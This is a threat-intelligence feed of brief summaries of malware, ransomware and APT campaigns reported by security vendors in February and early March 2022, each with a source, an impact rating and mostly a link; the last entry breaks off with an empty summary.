- Researchers from Symantec found a new highly sophisticated piece of malware being used by a Chinese threat actor and the backdoor is dubbed as Daxin. Most of the targets have been government organizations and have been interest of China. The malware has been also called the most advanced type ever used by China linked threat actors.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage
—
- Intel Source:
- STR
- Intel Name:
- RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA445 Targets European Governments
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- The Proofpoint Threat Research team has identified a likely nation-state sponsored phishing campaign using a possibly compromised Ukrainian armed service member’s email account to target European government personnel with a Lua-based malware dubbed SunSeed.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware being Redistributed
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- ASEC researchers has identified a redistribution campaign by Magniber ransomware which disguised itself as Windows update files. The distributed magniber files have normal Windows Installer (MSI) as their extension. Magniber ransomware is currently distributed using typosquating techniques targeting Chrome and Edge users with the latest Windows version.
—
- Intel Source:
- Cofense
- Intel Name:
- QakBot Campaign with old Tactics
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Confense Phishing Defense Center has analysed emails delivering Qakbot that use a familiar tactic which is used in old emails.
Source:
https://cofense.com/blog/qakbot-campaign-attempts-to-revive-old-emails
—
- Intel Source:
- Palo Alto
- Intel Name:
- Spear Phishing attacks on Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto identified a spear phishing campaign which was attributed to UAC-0056. The target organization were from Ukraine and the payloads included the Document Stealer OutSteel and the Downloader SaintBot.
Source:
https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
—
- Intel Source:
- ASEC
- Intel Name:
- ColdStealer Infostealer
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC has analysed a new type of Infostealer dubbed as ColdStealer it disguises as a software download for cracks and tools. There are two type of distribution methods used by ColdStealer first it distribute single type of malware like CryptBot or RedLine secondly Dropper type malware.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Electron Bot – SEO poisoning malware
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point Research has identifed a new malware dubbed as Electron Bot which has infected over 5000 active machines worldwide and being distributed through Microsoft’s official store. Electron Bot is a modular SEO poisoning malware which is used for social media promotion and click fraud. Once malware persist inside the targeted system it executes attacker commands such as controlling social media accounts on Facebook Google and Sound Cloud.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC3313 targets MiddleEast government
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers recently responded to an intrusion activity by UNC3313 who were targetting Middle East government also new targeted malware was used Gramdoor and Starwhale. The whole process started with targted spear phishing email.
Source:
https://www.mandiant.com/resources/telegram-malware-iranian-espionage
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- New wiper and worm targets Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- HIGH
- Summary:
- ESET researchers discovered new set of malwares and worm after the invasion of Russia on Ukraine. The malware was dubbed as IsaacWiper and HermeticWizard also a decoy ransomware called Hermeticransom aks Partyticket ransomware.
Source:
https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
—
- Intel Source:
- SentinelOne
- Intel Name:
- Evolution of EvilCorp
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Sentinel Labs have assessed with high confidence that WastedLocker Hades Phoenix Locker PayloadBIN belongs to the same cluster of malware which EvilCorp operates. A technical analysis was also done on the evolution evolution of Evil Corp from Dridex through to Macaw Locker and for the first time publicly describe CryptOne and the role it plays in Evil Corp malware development.
Source:
https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp
—
- Intel Source:
- Palo Alto
- Intel Name:
- SockDetour Targets U.S. Defense Contractors
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have came across a stealthy custom malware SockDetour that targeted U.S.-based defense contractors. Analysis shows that SockDetour was delivered from an external FTP server to a U.S.-based defense contractor’s internet-facing Windows server.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC2596 deploys Cuba ransomware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have tracked a ransomware gang as UNC2596 who also claims to be COLDDRAW and commonly known as Cuba ransomware have been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. Cuba operation primarily targets the United States followed by Canada.
Source:
https://www.mandiant.com/resources/unc2596-cuba-ransomware
—
- Intel Source:
- Intel471
- Intel Name:
- TrickBot Switches to New Malware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- As per the recent report by Intel 471 Trickbot is switching its operations and joining hands with Emotet operators. Also it has been noticed that Bazar malware family was also linked to trickbot recently as operators were taking over the TrickBot operations.
Source:
https://intel471.com/blog/trickbot-2022-emotet-bazar-loader
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_Seeder Queries_25/02/2022
- Date of Scan:
- 2022-02-28
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- netlab360
- Intel Name:
- DDoS attacks against Ukrainian Websites
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- NetLab360 researchers analyzed recent DDOS attack on Ukrainian websites and tracked botnets who were involved in it. Also as per them the C2s belong to multiple malware family including Mirai Gafgyt ripprbot moobot and ircBot.
—
- Intel Source:
- FBI/NCSC/CISA
- Intel Name:
- Muddywater attacks U.S/Worldwide
- Date of Scan:
- 2022-02-25
- Impact:
- HIGH
- Summary:
- Authorities from US and UK have released a detailed advisory about the recent cyber espionage campaign of MuddyWater which is allegedly state sponsored by Iran and works in the interests of MOIS. In this current campaign they have been mainly targeting government and private organizations from industries including telecom defense oil & gas located in Asia Africa Europe and North America. This time they have come up with a variety of malwares ranging from PowGoop Small Sieve Mori and POWERSTATS
—
- Intel Source:
- Intezer
- Intel Name:
- TeamTNT targeting Linux servers
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezer have alerted with TTPs of TeamTNT threat actor. Over the past year TeamTNT threat actor has been very active and is one of the predominant cryptojacking threat actors however currently targeting Linux servers.
Source:
https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/
—
- Intel Source:
- NCSC-UK
- Intel Name:
- Cyclops Blink malware by Sandworm
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- A Joint advisory has been published by NCSC [UK] and CISA FBI NSA [USA] that identifies a new malware used by the actor Sandworm. Sandworm also known as Voodoo Bear has previously been attributed to Russia’s GRU. The malware dubbed Cyclops Blink appears to be a replacement for the VPNFilter malware exposed in 2018 and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.
Source:
https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
—
- Intel Source:
- ESET
- Intel Name:
- HermeticWiper Malware
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- ESET Research discovered a new data wiper malware used against Ukraine. ESET detected that it was installed on hundreds of machines in the country. This follows the DDoS attacks against several Ukrainian websites.
—
- Intel Source:
- CyCraft
- Intel Name:
- Operation Cache Panda
- Date of Scan:
- 2022-02-23
- Impact:
- LOW
- Summary:
- Researchers from Cycraft have came across campaign which has been targetting Taiwan’s Financial trading sector with supply chain and this camapign has been attributed to allegedly state sponsored threat actor APT10.
Source:
https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt Strike targets MS-SQL servers
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC discovered a campaign in which unpatched Microsoft SQL Database servers were targetted by distribution of Cobalt Strike. The attacker usually scans port 1433 to check if MS-SQL servers open to the public if its found open then they launch brute forcing or dictionary attacks against the admin account.
—
- Intel Source:
- DFIR Report
- Intel Name:
- Qbot utilized to exploit ZeroLogon Vulnerability
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR Report has discovered that threat actors are exploiting Qbot and ZeroLogon vulnerability. The threat actor gained their initial access through the execution of a malicious DLL.
Source:
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
—
- Intel Source:
- Cado security
- Intel Name:
- Katana Botnet exploited Ukrainian websites
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A team from Cado security have identified the source as ‘Katana botnet’ (one of the Mirai variant) was behind the series of DDoS attacks against Ukrainian websites between 15-16 February. The impacted sites included Banks Government and Military websites. Moreover Ukrainian CERT 360Netlab and BadPackets have attributed the source of these attacks to Mirai botnet.
Source:
https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/
—
- Intel Source:
- ASEC
- Intel Name:
- CryptBot Infostealer
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A new version of the CryptBot info stealer was found by ASEC researchers which was getting distributed via multiple websites that offer free downloads of cracks for games and pro-grade software. In the current version of the CryptoBot there is only one infostealing C2.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Predatory Sparrow targets Iran’s BroadCaster
- Date of Scan:
- 2022-02-22
- Impact:
- LOW
- Summary:
- A wave of cyberattacks has floaded Iran in 2021 and early 2022. CPR team has done a technical analysis on one of the attacks against Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB) which occurred in late January 2022.
Source:
https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
—
- Intel Source:
- Blackberry
- Intel Name:
- Arkei Infostealer utilizing SmokeLoader
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- The latest analysis of the Arkei Infostealer shows that the cyber-thieves are increasingly targeting people using multifactor authentication as well as crypto-wallets. Arkei Infostealer is often sold and distributed as Malware-as-a-Service and has been spotted utilizing SmokeLoader as a method of deployment. Both Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs to conduct their malicious operations.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos RAT
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- ISC SANS Researcher has shared an analysis for a sample received via email. The file was received as an attachment to a mail that pretended to be related to a purchase order. Later Researcher attributed the file to Remcos RAT.
Source:
https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/
—
- Intel Source:
- ASEC
- Intel Name:
- PseudoManuscrypt Malware
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- Multiple windows machines in South Korea have been attacked by PseudoManuscrypt malware. This malware is said to be using the same tactics as of CryptBot. The malware’s target have been mostly government and industrial organization.
—
- Intel Source:
- SentinelOne
- Intel Name:
- TunnelVision exploiting Log4j
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed some activities of TunnelVision attackers which focuses on exploitation of VMware Horion Lojg4j vulnerabilities. The attackers actively exploiting the vulnerability to run malicious PowerShell commands deploy backdoors create backdoor users harvest credentials and perform lateral movement. Moreover Researchers has been tracking the activity of the Iranian threat actor operating in the Middle-East and the US.
—
- Intel Source:
- Fortinet
- Intel Name:
- Moses Staff targets Israeli Organization
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.
Source:
https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard
—
- Intel Source:
- ZeroFox
- Intel Name:
- Kraken- A new botnet
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Zerofox have found a new golang based botneyt dubbed Kraken which is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. Their targets are crypto wallets which are not limited to Armory Atomic Wallet Bytecoin Electrum Ethereum Exodus Guarda Jaxx Liberty and Zcash.
Source:
https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/#iocs
—
- Intel Source:
- Palo Alto
- Intel Name:
- Gamaredon targets Ukraine
- Date of Scan:
- 2022-02-18
- Impact:
- HIGH
- Summary:
- The Russia-linked Gamaredon hacking group aka Primitive Bear has been actively targetting wester government entity in Ukraine. The threat vector was phishing attack which leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a resume for an active job listing related to the targeted entity.
—
- Intel Source:
- Cofense
- Intel Name:
- Power BI Phishing Campaign
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Cofense Phishing Defense Center has analysed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Due to Power BI’s popularity commonly used and vendor trust it has become the prime target for threat actors to spoof and abuse it for phishing attacks.
Source:
https://cofense.com/blog/phishers-spoof-power-bi-to-visualize-your-credential-data
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSpark Campaign
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Inquest Labs researchers analysed a malicious document from the GlowSpark campaign which is a possible attack vector in the WhisperGate attack. Some samples of this campaign are quite secretive as it successfully infect the target. This allows the threat actor to gain a strong foothold in the victim’s network without leaving a large footprint.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet new Infection Method
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Unit42 have found that yet agan the infamous Emotet malware has switched tactics. In an email campaign propagating through malicious Excel files that includes an obfuscated Excel 4.0 macro through socially engineered emails. When the macro is activated it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload
Source:
https://unit42.paloaltonetworks.com/new-emotet-infection-method/
—
- Intel Source:
- SentinelOne
- Intel Name:
- ModifiedElephant APT
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers attributed the intrusions to a group tracked as ‘ModifiedElephant’. The threat actor has been operational since at least 2012 its activity aligns sharply with Indian state interests. The threat actor uses spear-phishing technique with malicious documents to deliver malware such as NetWire DarkComet and keyloggers.
Source:
https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
—
- Intel Source:
- STR
- Intel Name:
- BlackByte TTP_Seeder Queries_16/02/2022
- Date of Scan:
- 2022-02-17
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Picus Security
- Intel Name:
- LockBit 2.0 Ransomware TTPs
- Date of Scan:
- 2022-02-16
- Impact:
- HIGH
- Summary:
- On 4th Feb 2022 FBI issued a Flash report on Lockbit 2.0 Ransomware and few IoCs. Picus Security team has also shared TTPs used by the Lockbit 2.0 ransomware operators in emerging ransomware campaigns.
—
- Intel Source:
- Minerva Labs
- Intel Name:
- MyloBot Malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- A new version of the MyloBot malware has been observed to deploy malicious payloads that are being used to send sextortion emails demanding victims a huge sum in form of digital currency. MyloBot also leverages a technique called process hollowing wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses.
Source:
https://blog.minerva-labs.com/mylobot-2022-so-many-evasive-techniques-just-to-send-extortion-emails
—
- Intel Source:
- Checkpoint
- Intel Name:
- Trickbot Attacks Global Giants customers
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint analyzed new evasive technique of TrickBot and also found this time it has been targetting more than 60 firm’s customers worldwide. The trickbot operators have been using AntiAnalysis techniques so that researchers can’t send automated requests to Command-and-Control servers to get fresh web-injects.
—
- Intel Source:
- Fortinet
- Intel Name:
- BitRAT malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Threat actors are leveraging NFT (Non-fungible tokens) information to lure users into downloading the BitRAT malware. The campaign makes use of malicious Excel files named ‘NFT_Items’ to attract targets. These files are hosted on the Discord app and appear to contain names of NFTs forecasts for potential investment returns and selling quantities.
Source:
https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat
—
- Intel Source:
- SecureWorks
- Intel Name:
- ShadowPad RAT linked to Chinese government
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from SecureWorks were able to link recent activity of ShadowPad malware to multiple threat actors from China whose activity can be linked to Chinese ministry and PLA. It is the same malware which was behind the attacks on NetSarang CCleaner and ASUS.
Source:
https://www.secureworks.com/research/shadowpad-malware-analysis
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA2541 APT targets Aviation
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- ProofPoint researchers have identified threat actor TA2541 to be tragetting avaiation and aersospace industries. The threat actor commonly uses RATs through which they can control compromised machines. It is said that target can be 100 of organizations from North America Europe and the Middle East.
Source:
https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
—
- Intel Source:
- FBI FLASH
- Intel Name:
- BlackByte Ransomware
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- BlackByte ransomware had compromised multiple US and foreign businesses including entities in at least three US critical infrastructure sectors (government facilities financial and food & agriculture). Recently it came in news when the tansomware attacked San Francisco 49ers ahead of the Super Bowl.
—
- Intel Source:
- Sansec
- Intel Name:
- Magecart attacking Magento sites
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- According to Sansec more than 350 ecommerce stores infected with malware in a single day. All stores were victim of a payment skimmer loaded from a domain. The doamin is currently offline however the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
Source:
https://sansec.io/research/naturalfreshmall-mass-hack
—
- Intel Source:
- ESET
- Intel Name:
- OilRig’s New Espionage Campaign-Out To Sea
- Date of Scan:
- 2022-02-14
- Impact:
- MEDIUM
- Summary:
- Recently Researchers from ESET discovered a new campaign dubbed ‘Out to Sea’. This campaign was attributed to APT34(OilRig) which had also links with Lyceum group. Their malware toolset has also been developed and they have come up with a backdoor named Marlin.
Source:
https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf
—
- Intel Source:
- HP
- Intel Name:
- RedLine Stealer disguised as Windows 11 installer
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Threat actors have started luring Windows10 users soon after the announcement of Windows11 upgrade. They are using a fake microsoft website to trick users into downloading and running a fake installer and executing RedLine stealer malware.
Source:
https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/
—
- Intel Source:
- Cado security
- Intel Name:
- CoinStomp Malware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Cado Security Researchers has discovered a new malware campaign targeting Asian Cloud Service Providers (CSPs). Researchers dubbed the malware as CoinStomp this family of malware exploit cloud compute instances for the purpose of mining cryptocurrency.
Source:
https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Emotet dropping Cobalt Strike
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers at SANS has disected a Cobalt Strike sample dropped by Emotet and shared their analysis.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe Group/APT36
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers from Talos recently analyszed Crimson RAT and Oblique RATS sample and were able to attribute the attck to Transparent Tribe Threat group also knows as APT36. The thraet actor is known to be targetting India.Their initial infection vector is usually email purporting to come from official sources and containing a lure which can be a Word document or more often an Excel spreadsheet.
Source:
http://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html
—
- Intel Source:
- Cybereason
- Intel Name:
- Lorenz Ransomware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Lorenz Ransomware was first seen in February 2021 and it is believed to be a rebranding of ‘.s40’ ransomware. Lorenz Ransomware targets organisations worldwide with customised attacks and targeting victims mostly in English-speacking countries.
Source:
https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware
—
- Intel Source:
- Sophos
- Intel Name:
- SolarMarker Campaign
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- SophosLabs has monitored a series of new efforts to distribute SolarMarker an information stealer and backdoor. It was first detected in 2020 the .NET malware usually delivered by a PowerShell installer has information harvesting and backdoor capabilities.
—
- Intel Source:
- Intel471
- Intel Name:
- PrivateLoader
- Date of Scan:
- 2022-02-10
- Impact:
- MEDIUM
- Summary:
- An analysis of a pay-per-install loader by Intel471 researchers has highlighted its place in the deployment of popular malware strains including Smokeloader Vidar and Redline. The distribution of PrivateLoader is mostly through cracked software websites.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Molerat Palestinian-Aligned Espionage campaign
- Date of Scan:
- 2022-02-10
- Impact:
- HIGH
- Summary:
- A new campaign have been discovered by proofpoint researchers which details about operations of Molerat threat group who is allegedly affliated with Palestanine interest. TA402 is not only abusing Dropbox services for delivery of NimbleMamba but also for malware command and control (C2).
—
- Intel Source:
- Microsoft
- Intel Name:
- Mac Trojan:Update Agent
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- The Mac trojan has evolved and its avatar by name UpdateAgent has added multiple capabilities to its artillerylike bypassing gatekeeper. It lures its victims by impersonating legitimate software and can leverage Mac device functionalities to its benefit.
—
- Intel Source:
- DFIR Report
- Intel Name:
- QakBot Phishing campaign
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Qakbot activities since October 2021 has been demystified by DFIR researchers. A malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document the initial Qbot DLL loader was downloaded and saved to disk.
Source:
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Arid Viper APT
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has observed a new wave of Delphi malware called Micropsia developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. This is a group believed to be based out of Gaza that’s known to target organizations all over the world.
Source:
http://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html
—
- Intel Source:
- CyberGeeks
- Intel Name:
- Lazarus APT targeting job seekers
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Lazarus APT is yet again targeting job seekers and using job opportunities documents for companies such as LockHeed Martin BAE Systems and Boeing. In this blog researcher analysed document called Boeing BDS MSE.docx it focuses on people that are looking for jobs at Boeing. The malware extracts the hostname username network information a list of processes and other information that will be exfiltrated to one out of the four C2 servers.
Source:
https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/
—
- Intel Source:
- Volexity
- Intel Name:
- Operation EmailThief
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day XSS vulnerability in the Zimbra open-source email platform. The campaign has been named as EmailThief. The successful exploitation of the cross-site scripting (XSS) vulnerability could allow threat actors to execute arbitrary JavaScript code.
—
- Intel Source:
- Mandiant
- Intel Name:
- SEO Poisoning distributes BATLOADER malware
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Mandiant researchers uncovered a malicious campaign using SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites and packed it with keywords of popular software products and used search engine optimization poisoning to make them show up higher in search results.
Source:
https://www.mandiant.com/resources/seo-poisoning-batloader-atera
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese APT Antlion targets financial institutions
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Antlion (Chinese state-backed APT) has been targeting financial institutions in Taiwan in a persistent campaign over the course of at least 18 months. The attackers deployed a custom backdoor we have called xPack on compromised systems which gave them extensive access to victim machines.
—
- Intel Source:
- STR
- Intel Name:
- QBot_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- FBI FLASH
- Intel Name:
- LockBit 2.0 Ransomware
- Date of Scan:
- 2022-02-08
- Impact:
- HIGH
- Summary:
- LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques including but not limited to purchased access unpatched vulnerabilities insider access and zero day exploits.
—
- Intel Source:
- STR
- Intel Name:
- Lockbit 2.0 TTP_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- AhnLab
- Intel Name:
- Gold Dragon Malware
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- A new wave of activity from the Kimsuky hacking group have been spotted by ASEC analysis team. Group was using xRAT (open-source RAT) and dropped with their custom backdoor dubbed as Gold Dragon. The campaign started on January 24 2022 targeting South Korean entitites and is still ongoing.
—
- Intel Source:
- STR
- Intel Name:
- Blackcat Ransomware_Seeder Queries_04/02/2022
- Date of Scan:
- 2022-02-07
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Bleeping Computer
- Intel Name:
- BazarBackdoor malware campaign
- Date of Scan:
- 2022-02-07
- Impact:
- MEDIUM
- Summary:
- A new phishing campaign is using specially crafted CSV text files to infect users’ devices with the BazarBackdoor malware. The phishing emails pretend to be ‘Payment Remittance Advice’ with links to remote sites that download a CSV file with names similar to ‘document-21966.csv.’
—
- Intel Source:
- Cybereason
- Intel Name:
- StrifeWater RAT added to Iranian APT Moses Staff arsenal
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks. The RAT possesses other capabilities such as command execution and screen capturing as well as the ability to download additional extensions.
—
- Intel Source:
- @3xport
- Intel Name:
- Mars Stealer- New variant of Oski Stealer
- Date of Scan:
- 2022-02-04
- Impact:
- LOW
- Summary:
- A new variant of Oski stealer has been identified in the wild named Mars Stealer.It has capability to steal information from all popular web browsers two-factor authentication plugins and multiple cryptocurrency extensions and wallets.
—
- Intel Source:
- PWC
- Intel Name:
- White Tur Threat Group
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors dubbed as ‘White Tur’ the adversary hasn’t been attributed to a specific geography although it appears to have been active since at least 2017. The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution.
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Sugar Ransomware
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Recently an threat actor has been starting up a RaaS solution that appears to primarily focus on individual computers instead of entire enterprises but is also reusing objects from other ransomware families. Researchers analysed sample from a tweet and concluded it as Sugar Ransomware.
Source:
https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate Lateral Movement_Seeder Queries_02/02/2022
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Cybereason
- Intel Name:
- PowerLess Trojan by Phosphorus/APT35
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Cybereason researchers recently discovered a new set of tools which were developed by the Phosphorus group and incorporated into their arsenal including a novel PowerShell backdoor dubbed PowerLess Backdoor. Research also highlights a stealthy technique used by the group to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater targets Turkish users
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Researchers at Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributes this campaign with high confidence to MuddyWater which utilizes malicious PDFs XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.
Source:
http://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
—
- Intel Source:
- Symantec
- Intel Name:
- ShuckWorm targets Ukraine
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- Symenatec researchers cam through a cyber espionage campaign targetting Ukraine. This campaign was attributed a famous threat actor group called Shuckworm which is allegedly a state sponsored threat group from Russia.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Lazarus APT
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- This attack including a clever use of Windows Update to execute the malicious payload and GitHub as a command and control server by North Korean APT.
—
- Intel Source:
- AT&T
- Intel Name:
- BotenaGo Malware
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
